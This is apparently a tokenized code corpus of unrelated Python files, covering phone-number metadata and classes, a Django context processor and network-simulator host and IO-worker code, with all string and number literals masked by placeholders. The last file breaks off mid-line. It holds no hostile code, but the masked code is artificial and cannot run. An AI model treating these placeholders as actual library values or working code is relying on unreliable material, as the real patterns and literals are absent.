<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_ME = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' , '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' , '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_NO = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) ] , <EOL> main_country_for_code = True , <EOL> leading_zero_possible = True ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_SD = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , national_prefix_formatting_rule = u'<STR_LIT>' ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_TR = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' , national_prefix_optional_when_formatting = True ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' , national_prefix_optional_when_formatting = True ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . util import UnicodeMixin , ImmutableMixin , mutating_method <EOL> class CountryCodeSource ( object ) : <EOL> """<STR_LIT>""" <EOL> FROM_NUMBER_WITH_PLUS_SIGN = <NUM_LIT:1> <EOL> FROM_NUMBER_WITH_IDD = <NUM_LIT:5> <EOL> FROM_NUMBER_WITHOUT_PLUS_SIGN = <NUM_LIT:10> <EOL> FROM_DEFAULT_COUNTRY = <NUM_LIT:20> <EOL> class PhoneNumber ( UnicodeMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> country_code = None , <EOL> national_number = None , <EOL> extension = None , <EOL> italian_leading_zero = False , <EOL> raw_input = None , <EOL> country_code_source = None , <EOL> preferred_domestic_carrier_code = None ) : <EOL> self . country_code = country_code <EOL> self . national_number = national_number <EOL> self . extension = extension <EOL> self . italian_leading_zero = italian_leading_zero <EOL> self . raw_input = raw_input <EOL> self . country_code_source = country_code_source <EOL> self . preferred_domestic_carrier_code = preferred_domestic_carrier_code <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> self . country_code = None <EOL> self . national_number = None <EOL> self . extension = None <EOL> self . italian_leading_zero = False <EOL> self . raw_input = None <EOL> self . country_code_source = None <EOL> self . preferred_domestic_carrier_code = None <EOL> def merge_from ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . country_code is not None : <EOL> self . country_code = other . country_code <EOL> if other . national_number is not None : <EOL> self . national_number = other . national_number <EOL> if other . extension is not None : <EOL> self . extension = other . extension <EOL> if other . italian_leading_zero is not None : <EOL> self . italian_leading_zero = other . italian_leading_zero <EOL> if other . raw_input is not None : <EOL> self . raw_input = other . raw_input <EOL> if other . country_code_source is not None : <EOL> self . country_code_source = other . country_code_source <EOL> if other . preferred_domestic_carrier_code is not None : <EOL> self . preferred_domestic_carrier_code = other . preferred_domestic_carrier_code <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , PhoneNumber ) : <EOL> return False <EOL> return ( self . country_code == other . country_code and <EOL> self . national_number == other . national_number and <EOL> self . extension == other . extension and <EOL> self . italian_leading_zero == other . italian_leading_zero and <EOL> self . raw_input == other . raw_input and <EOL> self . country_code_source == other . country_code_source and <EOL> self . preferred_domestic_carrier_code == other . preferred_domestic_carrier_code ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __repr__ ( self ) : <EOL> return ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % <EOL> ( self . country_code , <EOL> self . national_number , <EOL> self . extension , <EOL> self . italian_leading_zero , <EOL> self . country_code_source , <EOL> self . preferred_domestic_carrier_code ) ) <EOL> def __unicode__ ( self ) : <EOL> result = ( "<STR_LIT>" % <EOL> ( self . country_code , self . national_number ) ) <EOL> if self . italian_leading_zero is not None : <EOL> result += "<STR_LIT>" % self . italian_leading_zero <EOL> if self . extension is not None : <EOL> result += "<STR_LIT>" % self . extension <EOL> if self . country_code_source is not None : <EOL> result += "<STR_LIT>" % self . country_code_source <EOL> if self . preferred_domestic_carrier_code is not None : <EOL> result += ( "<STR_LIT>" % <EOL> self . preferred_domestic_carrier_code ) <EOL> return result <EOL> class FrozenPhoneNumber ( PhoneNumber , ImmutableMixin ) : <EOL> """<STR_LIT>""" <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . country_code , <EOL> self . national_number , <EOL> self . extension , <EOL> self . italian_leading_zero , <EOL> self . raw_input , <EOL> self . country_code_source , <EOL> self . preferred_domestic_carrier_code ) ) <EOL> @ mutating_method <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> if len ( kwargs ) == <NUM_LIT:0> and len ( args ) == <NUM_LIT:1> and isinstance ( args [ <NUM_LIT:0> ] , PhoneNumber ) : <EOL> super ( FrozenPhoneNumber , self ) . __init__ ( ** args [ <NUM_LIT:0> ] . __dict__ ) <EOL> else : <EOL> super ( FrozenPhoneNumber , self ) . __init__ ( * args , ** kwargs ) </s>
<s> """<STR_LIT>""" </s>
<s> from . models import Message <EOL> def soapbox_messages ( request ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : Message . objects . match ( request . path ) <EOL> } </s>
<s> from config . experiment_config_lib import ControllerConfig <EOL> from sts . topology import MeshTopology , BufferedPatchPanel <EOL> from sts . control_flow . interactive import Interactive <EOL> from sts . input_traces . input_logger import InputLogger <EOL> from sts . simulation_state import SimulationConfig <EOL> start_cmd = "<STR_LIT>" <EOL> controllers = [ ControllerConfig ( start_cmd , cwd = "<STR_LIT>" , address = "<STR_LIT:127.0.0.1>" , port = <NUM_LIT> ) ] <EOL> topology_class = MeshTopology <EOL> topology_params = "<STR_LIT>" <EOL> simulation_config = SimulationConfig ( controller_configs = controllers , <EOL> topology_class = topology_class , <EOL> topology_params = topology_params ) <EOL> control_flow = Interactive ( simulation_config , input_logger = InputLogger ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import abc <EOL> from itertools import count <EOL> import logging <EOL> from pox . openflow . software_switch import DpPacketOut <EOL> from pox . lib . revent import EventMixin <EOL> from pox . lib . packet . ethernet import ethernet <EOL> from pox . lib . packet . ipv4 import ipv4 <EOL> from pox . lib . packet . tcp import tcp <EOL> from pox . lib . packet . arp import arp <EOL> from pox . lib . addresses import EthAddr <EOL> from pox . lib . addresses import IPAddr <EOL> import sts . util . network_namespace as ns <EOL> from sts . util . convenience import object_fullname <EOL> from sts . util . convenience import class_fullname <EOL> from sts . util . convenience import load_class <EOL> class HostInterfaceAbstractClass ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = abc . ABCMeta <EOL> def __init__ ( self , hw_addr , ips = None , name = "<STR_LIT>" ) : <EOL> self . hw_addr = hw_addr <EOL> ips = [ ] if ips is None else ips <EOL> self . ips = ips if isinstance ( ips , list ) else [ ips ] <EOL> self . name = name <EOL> @ abc . abstractproperty <EOL> def port_no ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ abc . abstractproperty <EOL> def _hw_addr_hash ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ abc . abstractproperty <EOL> def _ips_hashes ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def __hash__ ( self ) : <EOL> """<STR_LIT>""" <EOL> hash_code = self . _hw_addr_hash <EOL> for ip_hash in self . _ips_hashes : <EOL> hash_code += ip_hash <EOL> hash_code += self . name . __hash__ ( ) <EOL> return hash_code <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" + self . name + "<STR_LIT::>" + str ( self . hw_addr ) + "<STR_LIT::>" + str ( self . ips ) <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : object_fullname ( self ) , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : [ ip . toStr ( ) for ip in self . ips ] , <EOL> '<STR_LIT>' : self . hw_addr . toStr ( ) } <EOL> @ classmethod <EOL> def from_json ( cls , json_hash ) : <EOL> """<STR_LIT>""" <EOL> assert class_fullname ( cls ) == json_hash [ '<STR_LIT>' ] <EOL> name = json_hash [ '<STR_LIT:name>' ] <EOL> ips = [ ] <EOL> for ip in json_hash [ '<STR_LIT>' ] : <EOL> ips . append ( IPAddr ( str ( ip ) ) ) <EOL> hw_addr = EthAddr ( json_hash [ '<STR_LIT>' ] ) <EOL> return cls ( hw_addr , ip_or_ips = ips , name = name ) <EOL> class HostInterface ( HostInterfaceAbstractClass ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , hw_addr , ip_or_ips = None , name = "<STR_LIT>" ) : <EOL> if isinstance ( hw_addr , basestring ) : <EOL> hw_addr = EthAddr ( hw_addr ) <EOL> ips = [ ] if ip_or_ips is None else ip_or_ips <EOL> ips = ips if isinstance ( ips , list ) else [ ips ] <EOL> for i in range ( len ( ips ) ) : <EOL> if isinstance ( ips [ i ] , basestring ) : <EOL> ips [ <NUM_LIT:0> ] = IPAddr ( ips [ i ] ) <EOL> super ( HostInterface , self ) . __init__ ( hw_addr , ips , name ) <EOL> @ property <EOL> def port_no ( self ) : <EOL> return self . hw_addr . toStr ( ) <EOL> def __eq__ ( self , other ) : <EOL> if type ( other ) != HostInterface : <EOL> return False <EOL> if self . hw_addr . toInt ( ) != other . hw_addr . toInt ( ) : <EOL> return False <EOL> other_ip_ints = [ ip_addr . toUnsignedN ( ) for ip_addr in other . ips ] <EOL> for ip_addr in self . ips : <EOL> if ip_addr . toUnsignedN ( ) not in other_ip_ints : <EOL> return False <EOL> if len ( other . ips ) != len ( self . ips ) : <EOL> return False <EOL> if self . name != other . name : <EOL> return False <EOL> return True <EOL> @ property <EOL> def _ips_hashes ( self ) : <EOL> hashes = [ ip . toUnsignedN ( ) . __hash__ ( ) for ip in self . ips ] <EOL> return hashes <EOL> @ property <EOL> def _hw_addr_hash ( self ) : <EOL> return self . hw_addr . toInt ( ) . __hash__ ( ) <EOL> def __str__ ( self , * args , ** kwargs ) : <EOL> return "<STR_LIT>" + self . name + "<STR_LIT::>" + str ( self . hw_addr ) + "<STR_LIT::>" + str ( self . ips ) <EOL> def __repr__ ( self , * args , ** kwargs ) : <EOL> return self . __str__ ( ) <EOL> class HostAbstractClass ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = abc . ABCMeta <EOL> _hids = count ( <NUM_LIT:1> ) <EOL> def __init__ ( self , interfaces , name = "<STR_LIT>" , hid = None ) : <EOL> """<STR_LIT>""" <EOL> interfaces = [ ] if interfaces is None else interfaces <EOL> self . _interfaces = interfaces <EOL> if not isinstance ( interfaces , list ) : <EOL> self . _interfaces = [ interfaces ] <EOL> self . _hid = hid if hid is not None else self . _hids . next ( ) <EOL> self . _name = name if name else "<STR_LIT>" % self . _hid <EOL> @ property <EOL> def interfaces ( self ) : <EOL> return self . _interfaces <EOL> @ property <EOL> def name ( self ) : <EOL> return self . _name <EOL> @ property <EOL> def hid ( self ) : <EOL> return self . _hid <EOL> @ abc . abstractmethod <EOL> def send ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ abc . abstractmethod <EOL> def receive ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def has_port ( self , port ) : <EOL> """<STR_LIT>""" <EOL> return port in self . interfaces <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . hid ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . hid <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : object_fullname ( self ) , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : self . hid , <EOL> '<STR_LIT>' : [ iface . to_json ( ) for iface in self . interfaces ] } <EOL> @ classmethod <EOL> def from_json ( cls , json_hash , interface_cls = None ) : <EOL> name = json_hash [ '<STR_LIT:name>' ] <EOL> hid = json_hash [ '<STR_LIT>' ] <EOL> interfaces = [ ] <EOL> for iface in json_hash [ '<STR_LIT>' ] : <EOL> if interface_cls is None : <EOL> interface_cls = load_class ( iface [ '<STR_LIT>' ] ) <EOL> else : <EOL> iface [ '<STR_LIT>' ] = class_fullname ( interface_cls ) <EOL> interfaces . append ( interface_cls . from_json ( iface ) ) <EOL> return cls ( interfaces , name , hid ) <EOL> class Host ( HostAbstractClass , EventMixin ) : <EOL> """<STR_LIT>""" <EOL> _eventMixin_events = set ( [ DpPacketOut ] ) <EOL> _hids = count ( <NUM_LIT:1> ) <EOL> def __init__ ( self , interfaces , name = "<STR_LIT>" , hid = None ) : <EOL> """<STR_LIT>""" <EOL> super ( Host , self ) . __init__ ( interfaces , name , hid ) <EOL> self . log = logging . getLogger ( name ) <EOL> self . send_capabilities = False <EOL> def send ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> self . log . info ( "<STR_LIT>" % ( interface . name , <EOL> str ( packet ) ) ) <EOL> self . raiseEvent ( DpPacketOut ( self , packet , interface ) ) <EOL> def receive ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> if packet . type == ethernet . ARP_TYPE : <EOL> arp_reply = self . _check_arp_reply ( packet ) <EOL> if arp_reply is not None : <EOL> self . log . info ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( interface . name , str ( packet ) ) ) <EOL> self . send ( interface , arp_reply ) <EOL> return arp_reply <EOL> else : <EOL> self . log . info ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( interface . name , str ( packet ) ) ) <EOL> return None <EOL> elif ( self . send_capabilities and packet . type == ethernet . IP_TYPE and <EOL> packet . next . protocol == ipv4 . ICMP_PROTOCOL ) : <EOL> self . log . info ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( interface . name , str ( packet ) ) ) <EOL> t = tcp ( ) <EOL> tcp . RST = True <EOL> i = ipv4 ( ) <EOL> i . protocol = ipv4 . TCP_PROTOCOL <EOL> i . srcip = interface . ips [ <NUM_LIT:0> ] <EOL> i . dstip = packet . next . srcip <EOL> i . payload = t <EOL> ether = ethernet ( ) <EOL> ether . type = ethernet . IP_TYPE <EOL> ether . src = interface . hw_addr <EOL> ether . dst = packet . src <EOL> ether . payload = i <EOL> self . send ( interface , ether ) <EOL> self . log . info ( "<STR_LIT>" <EOL> "<STR_LIT:%s>" % ( str ( packet ) , interface . name ) ) <EOL> def _check_arp_reply ( self , arp_packet ) : <EOL> """<STR_LIT>""" <EOL> arp_packet_payload = arp_packet . payload <EOL> if arp_packet_payload . opcode == arp . REQUEST : <EOL> interface_matched = self . _if_valid_arp_request ( arp_packet_payload ) <EOL> if interface_matched is None : <EOL> return None <EOL> else : <EOL> arp_reply = arp ( ) <EOL> arp_reply . hwsrc = interface_matched . hw_addr <EOL> arp_reply . hwdst = arp_packet_payload . hwsrc <EOL> arp_reply . opcode = arp . REPLY <EOL> arp_reply . protosrc = arp_packet_payload . protodst <EOL> arp_reply . protodst = arp_packet_payload . protosrc <EOL> ether = ethernet ( ) <EOL> ether . type = ethernet . ARP_TYPE <EOL> ether . src = interface_matched . hw_addr <EOL> ether . dst = arp_packet . src <EOL> ether . payload = arp_reply <EOL> return ether <EOL> def _if_valid_arp_request ( self , arp_request_payload ) : <EOL> """<STR_LIT>""" <EOL> for interface in self . interfaces : <EOL> if arp_request_payload . protodst in interface . ips : <EOL> return interface <EOL> return None <EOL> @ property <EOL> def dpid ( self ) : <EOL> return self . hid <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . hid ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . hid <EOL> class NamespaceHost ( Host ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , interfaces , create_io_worker , name = "<STR_LIT>" , hid = None , <EOL> cmd = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> super ( NamespaceHost , self ) . __init__ ( interfaces = interfaces , name = name , <EOL> hid = hid ) <EOL> assert len ( self . interfaces ) == <NUM_LIT:1> , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> interface = self . interfaces [ <NUM_LIT:0> ] <EOL> self . cmd = cmd <EOL> ( self . guest , guest_eth_addr , host_device ) = ns . launch_namespace ( <EOL> cmd , interface . ips [ <NUM_LIT:0> ] . toStr ( ) , self . hid , guest_hw_addr = interface . hw_addr ) <EOL> self . socket = ns . bind_raw_socket ( host_device ) <EOL> self . io_worker = create_io_worker ( self . socket ) <EOL> self . io_worker . set_receive_handler ( self . _io_worker_receive_handler ) <EOL> assert interface . hw_addr == EthAddr ( guest_eth_addr ) <EOL> if name in [ "<STR_LIT>" , None ] : <EOL> self . _name = "<STR_LIT>" + interface . ips [ <NUM_LIT:0> ] . toStr ( ) <EOL> self . log = logging . getLogger ( self . name ) <EOL> def _io_worker_receive_handler ( self , io_worker ) : <EOL> """<STR_LIT>""" <EOL> message = io_worker . peek_receive_buf ( ) <EOL> packet = ethernet ( raw = message ) <EOL> if not packet . parsed : <EOL> return <EOL> io_worker . consume_receive_buf ( packet . hdr_len + packet . payload_len ) <EOL> self . log . info ( "<STR_LIT>" % str ( packet ) ) <EOL> super ( NamespaceHost , self ) . send ( self . interfaces [ <NUM_LIT:0> ] , packet ) <EOL> def receive ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> self . log . info ( "<STR_LIT>" % <EOL> ( interface . name , str ( packet ) ) ) <EOL> self . io_worker . send ( packet . pack ( ) ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : object_fullname ( self ) , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : self . hid , <EOL> '<STR_LIT>' : self . cmd , <EOL> '<STR_LIT>' : [ iface . to_json ( ) for iface in self . interfaces ] } <EOL> @ classmethod <EOL> def from_json ( cls , json_hash , create_io_worker ) : <EOL> name = json_hash [ '<STR_LIT:name>' ] <EOL> hid = json_hash [ '<STR_LIT>' ] <EOL> cmd = json_hash [ '<STR_LIT>' ] <EOL> interfaces = [ ] <EOL> for iface in json_hash [ '<STR_LIT>' ] : <EOL> iface_cls = load_class ( iface [ '<STR_LIT>' ] ) <EOL> interfaces . append ( iface_cls . from_json ( iface ) ) <EOL> return cls ( interfaces , create_io_worker = create_io_worker , name = name , <EOL> hid = hid , cmd = cmd ) </s>
<s> '''<STR_LIT>''' <EOL> import logging <EOL> import Queue <EOL> log = logging . getLogger ( ) <EOL> class DeferredIOWorker ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , io_worker ) : <EOL> self . _io_worker = io_worker <EOL> self . _io_worker . set_receive_handler ( self . io_worker_receive_handler ) <EOL> self . _receive_queue = Queue . Queue ( ) <EOL> self . _send_queue = Queue . Queue ( ) <EOL> self . _receive_buf = "<STR_LIT>" <EOL> self . _currently_blocked = False <EOL> def block ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . _currently_blocked = True <EOL> def unblock ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . _currently_blocked = False <EOL> while not self . _send_queue . empty ( ) : <EOL> data = self . _send_queue . get ( ) <EOL> self . _actual_send ( data ) <EOL> while not self . _receive_queue . empty ( ) : <EOL> data = self . _receive_queue . get ( ) <EOL> self . _actual_receive ( data ) <EOL> def send ( self , data ) : <EOL> '''<STR_LIT>''' <EOL> if self . _currently_blocked : <EOL> self . _send_queue . put ( data ) <EOL> else : <EOL> self . _actual_send ( data ) <EOL> def _actual_send ( self , data ) : <EOL> self . _io_worker . send ( data ) <EOL> def _actual_receive ( self , data ) : <EOL> self . _receive_buf += data <EOL> self . _client_receive_handler ( self ) <EOL> def set_receive_handler ( self , block ) : <EOL> '''<STR_LIT>''' <EOL> self . _client_receive_handler = block <EOL> def peek_receive_buf ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _receive_buf <EOL> def consume_receive_buf ( self , l ) : <EOL> '''<STR_LIT>''' <EOL> assert ( len ( self . _receive_buf ) >= l ) <EOL> self . _receive_buf = self . _receive_buf [ l : ] <EOL> def io_worker_receive_handler ( self , io_worker ) : <EOL> '''<STR_LIT>''' <EOL> data = io_worker . peek_receive_buf ( ) <EOL> io_worker . consume_receive_buf ( len ( data ) ) <EOL> if self . _currently_blocked : <EOL> self . _receive_queue . put ( data ) <EOL> else : <EOL> self . _actual_receive ( data ) <EOL> @ property <EOL> def currently_blocked ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . 